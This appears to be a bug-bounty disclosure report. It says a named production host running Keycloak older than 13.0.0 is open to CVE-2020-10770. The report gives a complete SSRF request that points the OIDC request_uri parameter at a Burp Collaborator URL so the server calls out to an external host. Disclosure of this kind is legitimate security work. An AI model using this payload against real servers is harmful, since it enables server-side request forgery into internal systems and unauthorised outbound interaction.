SSRF Keycloak before 13.0.0 - CVE-2020-10770 on https://sponsoredata.mtn.ci

##Vulnerable Website URL or Application: https://sponsoredata.mtn.ci ##Description of Security Issue: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. ##Steps needed to reproduce bug: 1.Using Burp Suite with Burp Collaborator send this request: * https://sponsoredata.mtn.ci:8443/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://0rs71imlpr20qx2svt6gfrotakga4z.burpcollaborator.net {F1490828} Reference: * https://nvd.nist.gov/vuln/detail/CVE-2020-10770 * http://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html ## Impact SSRF and External Interaction